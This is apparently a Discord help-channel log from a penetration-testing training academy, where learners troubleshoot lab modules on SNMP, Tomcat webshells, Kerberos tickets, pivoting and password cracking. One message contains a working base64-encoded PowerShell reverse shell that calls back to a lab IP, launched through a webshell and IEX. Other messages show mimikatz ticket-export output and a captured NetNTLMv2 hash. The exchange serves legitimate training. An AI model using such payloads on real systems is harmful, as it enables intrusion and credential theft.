#modules

I'll remember that.

To be fair, the introduction to Bash does not actually cover this subject

linux fundies?

I'll feed that back to the team, see if we can improve that module

The Bash module checked through

wouldn't it fit in linux fundamentals better? it's not limited to just bash

I don't think Linux Fundamentals will have it in tbh, but am checking

It does not iirc

Nothing in Linux Fundamentals on it either, yeah

I'll feed back to the team on the Bash module to include a segment on escaping special characters like that

i can use snmp set command to launch a script on an ystem runing and snmp agent right?

Usually snmp is just a gateway for other protocols

And it depends on the access level you have

Also you don't run commands on snmp. You just read the logs generally

yeah but you can get

and set values

typically as you say you use to just get valueeeeeees like cpu packet count etc.

but in the snmp section of footprinting module i think it asks to run a script

Nope

It asks you to read the output of a script

ah

The script itself had already run

Also you'd need to be on the manager, not the agent

well the manager would be my machine right? running the snmp get requests

Not really

You're just querying it

You can query with any device

The manager is it's own device

But often: you're not interacting with snmp as a complete foothold

You just query it for more info

i know snmp from the context of managing network devices

in order to get information like cpu load interface listings utilisation etc.

The script in question, was run and logged in the MIB

Which is where you're actually getting the info from

right so it has an oid in the tree where i can read the output

The tools showcased are only query tools

You can likely research it. But it's far beyond the scope of the course

in the end it's a simple grep on the walk

thank you

for the nudges

damn this module is dense!!!

Braa is honestly better

that's actually what i used

It outputs much nicer and more succinct

Instead of a wall of text to sift through

actually i started with snmp-check

i did a | tee savetofile

¯_(ツ)_/¯

and then grep savedfile

snmp-check pretty nice too, it organises everything nicely

you mean you guys don't netcat and manually input characters? weak

and it assumes a default community

yeah should have been typing it in binary written my own protocol in assembly

Can anyone help me on intro to bash scripting “comparison operators” ?

looking for someone who can assist me i am in and can share my screen . i cant find this flag in any directory

you'll have better luck simply stating what module/section/question you're on and letting us know what you've done already than asking to screen share with someone

attacking tomcat in attacking common web apps

its the flag last question.i have a webshell but cant seem to find the flag

i don't recall where it is, but as general advice i'd recommend checking the directory you obtain your shell in (obvious), probably a directory or two before that, and then just the root directory for the drive

the tree command can also help

hello do u still need help?

Quick question guys, how do you create an aspx file?

i literally just got done with that

msfvenome

Actually better question, how do you edit the hosts file in etc? Nano isn't working and the module didnt specify a way to actually edit it

you can use vim

also in order to edit the /etc/hosts u need to run it with sudo if u havent already

sudo nano /etc/hosts or sudo vim /etc/hosts

just in case you didnt know

Thank you, and yeah I know

need help ||executing .ps1 shell after uploading PHP cmd?= shell on the XAMMP target|| - Attacking Common Services - Easy

Input a command after =, i.e. ?cmd=whoami

yes, i know, but i'm trying to upload a .ps1 shell and calling it through the php shell, my commands are : ||powershell.exe%20%5BIO.File%5D%3A%3AWriteAllBytes%28%22C%3A%5CUsers%5CPublic%5Ct.ps1%22%2C%20%5BConvert%5D%3A%3AFromBase64String%28%22cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxMC4xMC4xNi4yMCcsOTAwMSk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7OyRkYXRhID0gKE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LkFTQ0lJRW5jb2RpbmcpLkdldFN0cmluZygkYnl0ZXMsMCwgJGkpOyRzZW5kYmFjayA9IChpZXggJGRhdGEgMj4mMSB8IE91dC1TdHJpbmcgKTskc2VuZGJhY2syID0gJHNlbmRiYWNrICsgJ1BTICcgKyAocHdkKS5QYXRoICsgJz4gJzskc2VuZGJ5dGUgPSAoW3RleHQuZW5jb2RpbmddOjpBU0NJSSkuR2V0Qnl0ZXMoJHNlbmRiYWNrMik7JHN0cmVhbS5Xcml0ZSgkc2VuZGJ5dGUsMCwkc2VuZGJ5dGUuTGVuZ3RoKTskc3RyZWFtLkZsdXNoKCl9OyRjbGllbnQuQ2xvc2UoKSIK%22%29%29||, and to call it i then run ||powershell.exe%20-nop%20-c%20%22IEX%20(New-Object%20Net.WebClient).DownloadString('file:///C:/Users/Public/t.ps1')%22||

You don't need to get a reverse shell

A webshell is enough

👍 thx, should what i was trying to do be possible though? im struggling to see how its not working

I'm not sure tbh. It could be getting stripped heavily

But the intended ways are ||load_file()|| and webshell

Yes, this one has 2 ways to get it

i never saw that function, what service is that in?

Reread the sql section, it's right there

thx, finally finished

hello there, can I DM you ?

👋 hello everyone. I'm trying to understand something with meterpreter and mimikatz. I'm doing the kerberos TGT module and I don't know where the files are saved when I do: ```(Meterpreter 3)(C:\Users\Administrator) > kiwi_cmd sekurlsa::tickets /export

The output says: ```MKCEAAAAAwIBAqGEAAAAITCEAAAAGxsGa3JidGd0GxFJTkxBTkVGUkVJR0hULkhU
Qg==
====================

           * Saved to file [0;3e7]-2-1-40e10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi !
``` but there aren't any files named like this on the cwd as well as my cwd. ```kiwi_cmd cd``` shows the right directory I'm in and I'm administrator on windows. I googled a lot but unless I copy mimikatz onto the machine or manually copy the ticket, then I'm not sure how to make the in memory mimikatz work to export tickets automatically. I did search the entire FS locally with powershell.

Note that I can write to the dir, because I activated the mimikatz logs and it works fine. It's just the export that does not work for some reason
Note2: if I upload mimikatz, then it the export works no problem. I don't know if there is a native meterpreter way

Can't you speicfy export path?

/export /dir:C:\SomeLocation

@void kayak

nope 😦 just tried and did not work. I also checked the manual and it does not seem to have any dir option. Also whatever I enter /e /adsfasf seem to also export. I'm thinking that's a bug

it likely means that the command defaults to saving in a specific directory

Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Filter "*.kirbi"

You can try using findstr as well.

yep, no luck here either

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c#L659C13-L659C34 Im trying to see in the source code, but i'm not sure how the in-memory meterpreter behaves as opposed to a dedicated mimikatz.exe process launched by powershell

I tried to migrate to multiple processes, but no luck as well

Yeah, it's an issue.

I just read a forum. It MUST export the tikcets in the current directory you are in.

Try launching mimikatz from powershell in some other directory like C -> transfer it manually.

yep that works perfectly if I run mimikatz manually, just not from meterpreter. I just tried a bunch of different things and it must be due to the fact that the extension is running in memory from another process.

thxs for the time looking into it, appreciate it a lot.

All good.

Now that I think about it.

If you run meterpreter in you /home/username/ directory

And you run mimi from the meterpreter

Wouldn't that save the tickets back to ur home directory

I wish it worked like that , 99% sure it doesn't tho.

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
AD Skill Assessment 2.

I can't seem to get interactive shell on the SQL01. I found the password from the file in the previous question, I suppose it's linked the the mssqlsvc account.

I used sqsh, but it doesn't work. I tried PowerUpSQL but it has no connection.
Any ideas?

mssqlclient.py gives out untrusted domain with windows-auth.

Without it, it just outputs some error in the impacket.

I’m on the shells and payloads module and I’m trying to connect to the inlanefreight.local website but it refuses to connect what am I doing wrong?

why is htb lab not spawing

The machines will spawn, they just take a minute or two to provision and be configured, patience 🙂

nope it's not on my system unfortunately, I looked there too. The command I'm running is from kiwi_cmd, not the kiwi ruby commands, I think the kiwi_cmd is passed through the little c module within meterpreter which should be executed in the context of the windows process. I'm thinking that the meterpreter kiwi wrapper will interface between the underlying kiwi_cmd command and the local reverse tcp session

OOf

@sleek moss refreshing the page won't maks any difference either I'm afraid. Your browser will receive a notification once the machine is available. Hopefully by now you have your target @sleek moss ?

i do danke

Nice, glad to hear it

forend::INLANEFREIGHT:846f684f9cdac33d:EC13D46F95D699BD27C75C66A166722C:0101000000000000009247B79796DA01112AEF3E5A2CE12A00000000020008004F0036005700410001001E00570049004E002D0055004F004B004D005900310043004F0059004D00440004003400570049004E002D0055004F004B004D005900310043004F0059004D0044002E004F003600570041002E004C004F00430041004C00030014004F003600570041002E004C004F00430041004C00050014004F003600570041002E004C004F00430041004C0007000800009247B79796DA0106000400020000000800300030000000000000000000000000300000D00D495199B80E75934F78E4F7980E160A3B4FA44505B5AE9D36070224C0EA450A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
i used hashcat -m 5600 and it didnt crack even with rockyou wordlsit which was said on module it said it exhausted list

└─$ hashcat -m 5600 -a 0 crack /usr/share/wordlists/rockyou.txt

Hey guys, I am curious about an issue I ran into while in the Intro To Assembly Module, I'm at a part that concerns pwntools, I am trying to use gdb to debug an elf file that was made using the pwntools function ELF.from_bytes(unhex(<shellcode>)).save(<filename>). The issue being, gdb debug the file for some reason. Was wondering if anyone else came across this issue.

Module: Active Directory Trust Attacks
Section: Unconstrained Delegation
Link: https://academy.hackthebox.com/module/253/section/2803
Question: Abuse Unconstrained Delegation to get the TGT of DC01$ and submit the flag located at \DC01\UCD_flag\flag.txt.

I have ran dcsync attack against krbtgt account. Obtained the hash and created the golden ticket. I am unable to access DC01. I keep getting permission denied.

Please help. Thank You.

You're going to need to say which module / section, that username is used a lot

Use windows auth

wrong account

gotcha, thanks.. i always forget to try reusing 🙂

now you're making me look like a crazy person

hahaha dont want to spoiler 😄

now i have it but cant copy paste from novnc 😢

Is it faster to brute force pop instead of IMAP or roughly the same?

Roughly the same

As bruteforcing is just attempting to login

Though usually you should have a username to attempt with

theres only ssh/pop/imap on this, and i cant user enum any of them i think

its 8.2p1 so not vuln to ssh-user-enum (i believe)

i figured the only thing i can do is brute it
no emails or anything from nc / openssl banner grabbing

Never brute ssh unless forced

im bruting imap

What section/module?

hard footprinting

Oh. There's definitely more open iirc

ill do another scan 👍

Try scanning udp

ah shit yeah i ignore that on htb since it takes so long.. can probably guess which port is open now you said that

lol was right

Also read the brief for it: it might enlighten you as to what to look for lol

mx / management server / backup server mehhhh not sure. tbh i have very little ||snmp|| experience in production, it simply isnt used at the places ive worked

so it wouldnt be something i check. but im definitely gonna put it up there now

Keywords

do management servers usually handle ||snmp||?

Yes

what is a 'management server' lol

simple network management protocol

Basically like update servers

I.e. a staged server

ah right, yeah the only thing i know that has snmp are UPS units

ill have to look up some examples

great for monitoring when you can't shove some kind of agent on the device

i assume u just whip it in promtail and feed it to prometheus or logstash?

also im in 😎

It's honestly fairly straightforward

Like 1000% easier than the easy lab

honestly easy took me no time at all

idk i did the relevant modules this week so its all so fresh i kinda knew whats up 😄

Nah. It's not even that

Common consensus is that the lab difficulty is out of order

they all seem quite easy though, maybe med on the hard one because it requires more enumeration than usual but its basically ||'find open port -> it has password -> use it on the other port -> you are in'||

which i guess is how it works in real life 🤣

I mean yeah, if there's low security posture

Attacking common services - hard
hint states that there should be ||2 users capable of impersonating, yet theres only 1 session?||

im questioning if its the other ||impersonation|| route but i just wanted to make sure before i try b/c the rdp is insanely slow

your current way is wrong

it also doens't require rdp 😉

ty... rdp is taking 5+ seconds to register input..

Is someone available to help with the footprinting imap/pop3s module?

i literally just finished it what you need 😄

Mind if i dm?

np

i can also help 🙂

curious to know if i completed attacking common services HARD properly, my route after obtaining ||fiona|| credentials was ||mssql, impersonate as john, execute the OPENROWSET to view flag.txt file over the linked sql service.|| im not too sure if i did it properly b/c i never used ||julio|| or ||patric||'s credentials nor did i have to RDP

hello guys,
pivot module - Remote/Reverse Port Forwarding with SSH
i completed this secctionn but little understand maybe you can tell me 🙂

Wouldn't it be worrying if that's what she said to me?

What about it did you find confusing?

yes little

I don't understand why I should get a reverse connection on a machine I have access to, I already know the information about the machine.

did you have remote command execution before?

no

well now you do

having rce on a machine makes what you can do on it almost limitless

you can obtain the id.rsa key to ssh in with no password, set up users, privilege escelation to make yourself root, access almost anything

you can also obtain the flags hidden on the computer for ctf's and the modules

The section shows you how you can create a route back to you. If you wanted to capture an escalated reverse shell, you can catch that on your host instead of the foothold. You're only limited by your imagination after that. Forward SMB requests, quickly transfer a file further into the network, etc.

what is the problem?

Hi I am stuck in attackinng thick applications in attacking common applications.
I am facing compilation error in fatty

can someone help me debug it please

been stuck at it for weeks

The password is the problem. Put the password in single quotes 'HTB_@cademy...'

Have you watched the ippsec video on fatty?

yea but I cannot compile it even after following the steps word for word

when i try ippsec's method with creating a project with the fatty jar as a reference library I get a bunch of syntax errors even after using java 1.8

I'm confused between ejpt, eWPTX and eWPT.
Which course should I take I have no professional experience which one will b batter for job??
Like I think (correct me if I'm wrong) ejpt is a bit easy so is it okay to jump for eWPTX or eWPTX?

I try to use socat on windows but I get an

.\socat.exe TCP-LISTEN:8000,fork TCP:127.0.0.1:1337
2024/04/25 02:48:36 socat[16964] E connect(5, AF=2 127.0.0.1:1337, 16): Connection refused

If you want to bypass the HR filter, then you probably need OSCP

If it's about gaining good knowledge, then CPTS is probably right for you

I double checked resource monitor and there was no service blocking 1337 or 8000

Ik oscp would be great but it's too costly

any idea what should I do?

Take a look at the job advertisements. Then you will see which certificates you need to bring

If I had to venture a guess, it seems like you're skipping a step or two

I tried following the module
decompile the jar file using jdgui > remove the rsa and 2.sf files > remove the hashes from MANIFEST.MF > change the port from 8000 to 1337> compile using jar -cmf ./META-INF/MANIFEST.MF ../new-fatty.jar *

I run the jar with java -jar new-fatty.jar get the error cannot find file htb.....Starter

I double checked the MANIFEST file there was no wrong path

here is my modified jar

I'm sure sure why you are trying to run socat

the powershell is on admin

if you complete cpts then the oscp will be easy. cpts is harder and more advanced so you would only have to take the oscp once

I want to forward my 8000 port to 1337 to try ippsec's method

I set the hosts file to 127.0.0.1 fatty.server.htb

Ik I was about to take cpts but it's costly too that's why I'm going with ine certs

any advice how to approach?

I just went through the steps to where it shows you the login successful part (yes i didn't take notes, sue me) on the VM HTB provides for the section

only steps you need to take are to extract the files, edit the port, manifest.mf, and delete the two files and jar it back up. As explained in the section the make sure your manifest.mf has a new line.

yes I did follow the steps exactly

here

and make sure you have a new line in your manifest.mf

I had 2 new lines

let me make it to one and then try

Manifest-Version: 1.0
Archiver-Version: Plexus Archiver
Built-By: root
Sealed: True
Created-By: Apache Maven 3.3.9
Build-Jdk: 1.8.0_232
Main-Class: htb.fatty.client.run.Starter

I did what I explained on the host itself as a means to reduce any complexities, maybe you should as well.

yes I tried to do it on the foothold and pwnbox too and got the same results

this powershell is from the foothold

Mind if I DM you?

sure

WINDOWS PRIVILEGE ESCALATION this modul is a pain...so much lagging...

fucking incredible module

nice

anybody knows why this doesnt work?

Who is solved skill ass injection attacks

Usually you would import a .ps1 and invoke it on some way

It also helps to say what module you're working on

And what section

Hello guys
i added the ip in the sudo nano /etc/hosts but i don't know why the on the firefox is not opening the ip address even i connected to the vpn

Because you need to add the domain such as inlanefreight.htb as well

ip domain

If you're doing a box, then it autoredirects to boxname.htb

And if it's not in your hosts file, it doesn't resolve

I need a help to know the name of the first section of Intro to Academy
I've tried many times with incorrect answer

i personally use this command(its quite long but i have it saved and just copy paste it)

echo "ip_adress domain" | sudo tee -a /etc/hosts

Figure out what a section is, they do tell you it in the reading

Modules are broken down into sections, that is your only hint

I read everything carefully but every answer I put in come as incorrect

Then you're not understanding what a section is

Each section is a page in the module

Look at the Table of Contents

HI

HI

hello guys,

i dont understand this question
pivot module - Meterpreter Tunneling & Port Forwarding

last question
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)

has anyone done the skill assessment for intro to whitebox pentesting?

Hi did you found the awser?

yoo everyone

Yes, currently 88 people have completed this module

hmm know where to go for tips? lol

not working

this working on the thm

anyone using vencord?

Well this isn't thm

Joe

should i tell my steps what i am doing

What module are you doing, and what's your /etc/hosts. If it's a box on app.hackthebox.com then move this to #boxes [read #welcome to access it]

first i am connecting to the vpn in the machines section

i am doing builder machine

Yeah, wrong channel my dude. Read and follow #welcome

on the hack the box

And you'll have access to #boxes

This channel is for help with academy modules https://academy.hackthebox.com

@fleet birch I don't do random dms

sorry

@fathom pendant sir help -_-

https://tenor.com/view/please-stop-ugh-gif-18026759

Subnet/mask

That's what it's asking for

examine the traffic to and from IP addresses. look for any patterns or telltale signs of C2 activity. you can follow the trail and arrive at the points of origin

😄 thx finished

Don't @ me again. Always read the section again if you get stuck

I believe the example and everything even points out what it wants

That's right, I thought he wanted two different ip.

okey

The answer key gives you the format it wants. And looking at the output of autoroute would have made it clearer

adding route to subnet/netmask

Anyone able to assist on the skill assessment for intro to whitebox pentesting?

Just ask your question here

so i'm looking through the code, and i've come down to the conclusion that the vulnerable function must be the ||ping api route||. It's the only route that seems to do more conditional checks and also has ||eval()|| inside. i've been able to successfully send a payload that will ping an IP of my choosing, but seems I'm unable to breakout. The execFile() tells me it can only do a single command at a time, so adding code behind my ip will ||ping the ip|| but everything else fails. I thought maybe I could set the uip and add javascript code injection there, but everything i've tried with that fails too

cant tell if im in a rabbithole or not lol

You are on the right track.
Make sure that your payload does not break either the ||JSON|| or the ||Javascript||

are vm's bugging? cant spawn the machine for 'attacking common services-smb'

Is there a way for us to look that up or is it a mod thing?

Anyone who has completed the module can see how often the badge has been issued

Where?

https://academy.hackthebox.com/my-badges

Can I check if anyone is facing issues with spawning target?

I have been trying to spawn target not working either

Jopp same here

Does anyone has any tips?

I don't see it, that only shows my badges and doesn't show info about how many people have them

Open the shareable link

and then?

oh i see

you have to share the link, then go to the shared link

thanks. kinda weird it doesn't just show it when you click on the icon or something

Anyone know why HTB main website is super, super slow?

On HTBLabs

Is it because of maintenance? I don't know exactly what time it is meant to happen, like start/finish? I'm unsure

yes its super slow for me too no targets are working for me

I am also not able to spawn any targets to work on the HTB Labs

I relate; same :L

I guess I'll go to PortSwigger or THM for a little

Has to be the maintenance it was talking about

I have a question for all of you out there is there someone sitting in SWE and want to have a study group or something like that ??? iam sitting with the pentesterpath at the moment 65 % through so if someone wants to study together hit me up !!! 🙂

I would bro but I'm on CBBH path haha; I'm a noob

also struggling to spawn a target in the Footprinting module

well iam a noob too 🙂

Hello guys, i'm trying to do a module, but when i'm trying to spawn the target cible, i have "Target is spwning" but nothing happen

nothing is working at the moment

and it seems i can't find a way to contact the support

oh

i think there is a maintanmence

or something

Hello does anyone know if you can spawn a lab again after completing it?

I'll add you fam

I got no idea; is there a reset button for it?

yes you can

Thanks! I thought you couldn't as my machine won't spawn but seems like it's happening to other people too

just now i started a machine and it worked, maybe it's back up

/module/19/section/102 The target cannot be spawned. Is this known?

Is see, well +1 for this issue.

hi guys please i need help trying to coonect to ssh root using id_rsa but i got error in libcrypto how do i solve this

is the ssh server configured to allow root login?

normally sshd has norootlogin set

there's a lot of things , first is the key of the root user ? did you give the right permission to the key ? is the root user allowed to login ?

maybe provide the command u use and the error u get

also run your ssh command with -vvv for max info

yes it loging but asking to enter password and yes i gave it chmod 600

asking for password that means the key is not correct

sudo ssh root@ip -p xxxx -i id_rsa

or make sure the permission are set

which module ?

-p is for port

privilege escalation getting started module

command looks right

what is the error?

and run with -vvv

it will give u more info

idr using ssh keys in this

Load Key "id_rsa": error in libcrypto then it show to enter root password

ok so it isn't finding the id_rsa key file or the key file is not correct

do you have a file on your machine called id_rsa

yes i copy it and use nano to create

also it wouldd have to be on the server in the users .ssh/authorized_keys file

use nano to create what?

id_rsa

and i paste the hash there and give it 600 permission

but that needs to be a key file

let's step back

are you running a linux box?

wait wait , tell us what have you done from the first

yes am connected to vpn on my linux

try to run an ssh server on your machinne and login to the ssh server

no no you will make him lost

you can ssh locally and provide the path to the id_rsa

or you can base64 encode the key and decode it on your box

this id_rsa you generate it right ?

he should do it on his machine. This will help him understand how an ssh key login works

locally or remotely, it's still logging in with a key

i login user1 cd to user2 got the flag, then cat root/.ssh/id_rsa

yes but if he does it on his machine

he will understand that .ss/authorized_keys needs to have the public key of user

and you find the id_rsa

and that sshkeygen is need to gen the keys

right ?

etc. and thus what he's trying to do on the remote box will make more sense

iirc sshkeygen is out of scope for that module

it just sounds like they had an issue with copying the id_rsa

yess exactly

you guys are awesome thank you all i will keep trying to figure it out

maybe check the md5sum of the id_rsa

yes i will try all you guys said got all night

if you want to ensure that you get no errors, you can cat the contents of the key and base64 encode it

then copy the base64 string and decode it on your own box and output it to a file

alright doing that

Hi guys! I would like to askf for help on the Brute Forcing Passwords on the Broken Auth module.

Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?

||I have used this to filter out rockyou-50.txt: grep '[[:upper:]]' rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' |grep -E '^.{3,}$'||

||I was only able to identify 5 passwords based on the above filter, and non of them worked.||

I little bit of nudge/hint is much appreciated.

Does anyone know why I would get this error

At C:\Users\user\PowerView.ps1:20882 char:43
+ Set-Alias Get-NetOU Get-DomainOU#requires -version 2
+                                           ~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Set-Alias], ParameterBindingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.SetAliasCommand```
    
When trying to Import-Module PowerView.ps1, but then running the command again imports it and makes it work? Why does loading it twice work and loading it once doesn't?

Hey I was thinking to go for cbbh cert I have 2 questions:- 1. How long is the duration like how long I the time period under which we have to prepare
2. Everything's going to be in the text format or will it include videos too??

look at the line causing the problem ig

Yeah but then it just works without modification again?

finally got the command injection.. its weird because i've tried this syntax over a dozen times i guess...

MODULE: Whitebox Attacks
SECTION: Client-side Prototype Pollution

I'm really struggling with manifesting the attack chain in the exercise. After examining the /admin.php page contents, I thought that I was meant to forcefully have the victim promote my account, but my payload(s) haven't worked. Am I in the right ballpark?

Yes, you are on the right track.
||Search for client-side-prototype-pollution on Github.||

.

I am stuck in the "unconditional branching" section of the Intro to Assembly language... the questions is: Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end?

I tried many things but all answers I get are wrong... for me the loop will never happen since I need to jump...

Hi guys, I have an issue that sometimes occurs when I restart my instance. After restarting, it stops working with this error: 'Error: Something went wrong while generating your VPN Key. If this persists, please contact support.' Maybe this is a well-known error. What should I do? ( ping me )

have you tried contacting support? lol

i think there is a problem on htb end, in #cpts someone else is having trouble with vpn connection, and i too have the same problem

can I dm you?

sure!

okay ty

anyone in trouble to spawn targets??

#modules message

it's a general issue from htb

Yeah can't spawn target nor connect to the vpn, seems to be on htb end, people having the same problem in #cpts

now my target spawned, i connected in vpn, but i can't access the target via xfreerdp, lol

the same for me

Im doing the shells and paylaods and is on the last question on infiltraiting windows, can someone help me?

Where you stuck?

I cant get a shell in metasploit and ive done it like the module has shown

Be sure that you're setting the rhosts and lhost correctly

Well hard to help with only that. Usually just retype or restart the machine. If yoi got the correct metasploit exploit you just need to change the LHOST and RHOSTS.
Its smart to type options at rhe end again to see if you misspelled RHOSTS example

Thanks ill try again

Hi, could anyone please check if the Target spawns in this module? https://academy.hackthebox.com/module/134/section/1204

Other modules seems works fine, except this one.

That's the reply i've got from the server:
{"success":1,"ready":0,"ip":null,"life_remaining":119,"remaining_life_in_seconds":7193}

Anybody els having problems spawning targets ?

got the same problem while on my cdsa exam

Same here. Seems to be a known issue: https://status.hackthebox.com/incidents/f2c5871f-f546-461d-aa82-9d3bc75e752a

Someone is having problems with Target is spawning...?

yeah

It keeps loading and does not start the labs. 😦

i think everyone

aa okey

it's EU issue it seems, I changed my vpn and pwnbox to US East and it works now

i can connect im my vpn, but i can't spawn target

like me, what I can't do is spawn the lab.

eu doesn’t work. us west doesn’t work either.

Does not start labs

😦

now it has worked xd

lol

here too

yes

But does it work with the EU VPN?

it only worked for me with the US ones, but it did work briefly with the EU a couple of hours ago

I'm still having issues with EU

Try changing to US

Yep, that works
Thanks ^^

.

I can't start any targets. Someone else with same problems?

Yep same problem here

Sometimes it can take a few minutes, but I'd you're on EU, switch to US

https://status.hackthebox.com

if you're in EU it's past your bedtime

Had same issues, switch to US

EU servers are currently having problems

how? I can only switch VPN to us but targets?

Targets will spawn on the US vpn

i see

Strange because i try to spawn them and not working

Vpn dictates the spawn point for targets. You'll obviously need to dl a new vpn pack to connect on your own vm

Yep i switched to US and it worked

which one? I have tried 2 but didn't worked. now I'm trying 3

nvm

3 worked

Yes i switched to 3 also

Is it just me or is the Academy glitching
course progress green checks are gone, and cube graphics
and I get errors when I click mark and complete

Anyone within the CSDA path that can help with question 1 in "Snort Rule Development". Looking for the content word that would trigger an alert based on a log4j pcap file. I've basically pinpointed it down to a couple lines but I've no idea what the keyword would even look like as they all look similar.

Sometimes refreshing helps

same

something got fucked up

nah, its me too

¯_(ツ)_/¯

@west rampart idk who to tell but something got fucked up in the scademy and the ticks next to the sections dont show

academy*

Refreshed, logged in and out, likely an update to the site bug

Message support to report the issue ig

frfr

¯_(ツ)_/¯

did already

michikat dont answer

They cant be online 24/7

im pinging the one that are currently here

He might just have discord client open

Also don't ping staff a bunch

worth a try

Well, I mean when it comes to the operation of the Academy, I do not think they would mind being pinged as it is a revenue generator for them 🤷‍♂️

The support chat exists to report issues

Multiple avenues to report issues are available, I am not sure why you are pushing back on any of it other than to be contrarion. We are trying to solve an issue.

engineers are already aware of the EU vpn issues so they can also work on other issues ¯_(ツ)_/¯

You do not need an engineer to modify the academy interface, it is a web design bug

Discord generally isn't the best way to report issues as it can take an unknown amount of time before it's seen by the intended recipient

No harm in trying all avenues

I don't think a ping to staff member is needed for a visual bug

As long as it's still recording as completed, it's fine

It is producing errors, so yes

It is not recording anything

If it's not recording as completed then it's an issue

Can you submit flags and move to next section?

Move yes, but receive errors and no completion

Mark complete and next works fine for me

I am about to finish a module, so we shall see

But nothing is marked completed for me yet

How should the response to this question be: There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique involving Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer. Is the answer supposed to be the byte XX?

Cant test with flags since i dont have a spare one lying somewhere

So it's accepting your answers

I am not a moron folks lol

We weren't saying you are?

is it me or are the exercise spawned machines a bit flaky sometimes

actually i think it's the vpn

it doesn't deal well with long periods being connected

If you're using EU, switch to US

There are problems with EU vpn
https://status.hackthebox.com/incidents/f2c5871f-f546-461d-aa82-9d3bc75e752a

you replace the XX with the byte

ok thx

i had done that

but i think more generally i find that the openvpn connection get's out of synch or has other issues

I usually prefer that over spawned machines, but yes I have noticed sometimes it's slow

when i say spawned machines i meant spawned targets. I never use the pwnbox web machine

sharing this here, for whoever is doing the Password Attack module, section Pass the Ticket on linux. One of the question is refering to cracking the keytab file for the svc_**** user from a user we already cracked the keytab. The keytab ticket I'm refering to only has the aes-256-cts-sha1 identity in it and according to the example, you are supposed to use the one with the NTLM instead. However, I was interested in finding if it was possible to crack and it is with: hashcat -m 28900 -a 0 '$krb5db$18$<username>$<domain>$<aes-256-cts-sha1>' <wordlist> This is referenced in: https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml to get the encryption type 18 (like it says in the github project the module recommend) and then this page https://hashcat.net/wiki/doku.php?id=example_hashes is a good resource to have anyway. I don't know if people went the same route or they did not bother and skipped this. One thing to note is that ntlm is WAY faster to crack than aes-256-cts-sha1 lol

Because this method is way more complicated when NTLM is like... right there

for sure! I just wanted to find a way in case it will not be right there in a future case

But is this byte the response format?

For some reason, I finished the "JavaScript Obfuscation" module but it takes me to the details module page and still shows I have some left to finish. Not sure how this happened? I answered all the questions and clicked the "Finish" but on the final page. It's just not showing completed?

Visual bug on the site currently

yes, enter the byte as the answer

Also make sure on each page you click "mark complete and next"

Thanks @fathom pendant I went back through whole module and forgot one question. So finished now. 😆

@remote latch if you are facing issues, please open a support ticket

We are all having issues with Academy currently, progress and visual bugs.

Please open a ticket then

I finished a module, it's only a visual bug, once you click on "Mark complete & Next" it is registered as completed

Perfect

Okay, thanks for the tip. 🙂

thats not personal, thats global cuz several people have such glitch meaning its probably everyone

Ticket is still the way to go

its just that the side icons for completing stuff and other are gone

thats quite literally the issue

considering its other too, its some sort of bug with the website/css

or the image

Hmm, I see the issue I think

what is it(yes im very interested in it)

There's an issue loading the FontAwesome assets it seems

^_^

thats also for the sections in each module

not the dashboard only

Yeah

is troll synonym to goblin?

No, g0blin is just my nickname 🙂

Hi, I just started with academy and when i complete a machine in the academy module it doesn’t appear on htb labs as pwned. Was wondering how you go about it? Wether you just paste the flags there as well or leave it for later to solve one more time?

They are separate platforms

Academy and Labs aren't linked with boxes

If you're referring to the "Getting Started" Nibbles example it will not reflect

You'd have to go pwn the retired machine on the labs site

And the flags will be different

oh okay thats clear now. thank you!

This should be resolved now @remote latch

It is for me

Great

I am currently working on a module available at "https://academy.hackthebox.com/module/24/section/160" and I am struggling to answer the second question. The hashes generated by 'hasher' and 'md5sum' are very similar, except that hasher's hash is in lowercase and md5sum's hash is in uppercase. I have tried other hashing tools, but I am still getting the same hash values as hasher's/md5sum's. However, I am unable to submit a valid answer.

Did you unzip the file? The hash starts f45 and ends b9d

hmm, that's not what I'm getting

Make sure no extra spaces before or after

But as I said

Did you unzip?

ye, I did unzip but my hash starts '788' and ends as '92a'

I am deciding between silver and gold and they both say " Step-by-step module solutions" What is this and where is this? I have been through several module and have not seen Step-by-step solutions. There are some module where you have to duplicate what you see in the reading and type DONE but not all are like that.

I'm getting 32 chars exactly and there are no extra spaces included

Those arent plans for academy are they?

Lab.htb and academy.htb have different sub plans

This is for academy

The plans on Academy do include that term as a perk "step by step module solutions".. honestly not sure on how they are provided, or at what point (e.g. do you need to complete the module first)?

Oh shoot my bad then. I never saw it

I literally just did it and it works just fine for me

It's a new feature of the annual subscribers. You need to enable it in settings once you are subscribed

I was gonna test this out soon.tm

This is what I am talking about:

It's literally a brand new feature so it hasn't been around long enough to have any proper feedback

Ah yeah, I see it now after enabling @fathom pendant

It's precisely that

I've had time to nap so I can have a more cohesive thought process regarding it. Imo if it's just a literal step-by-step guide without first having some minor gateway in place, i.e. failing a question multiple times like the discord help feature, is a detriment

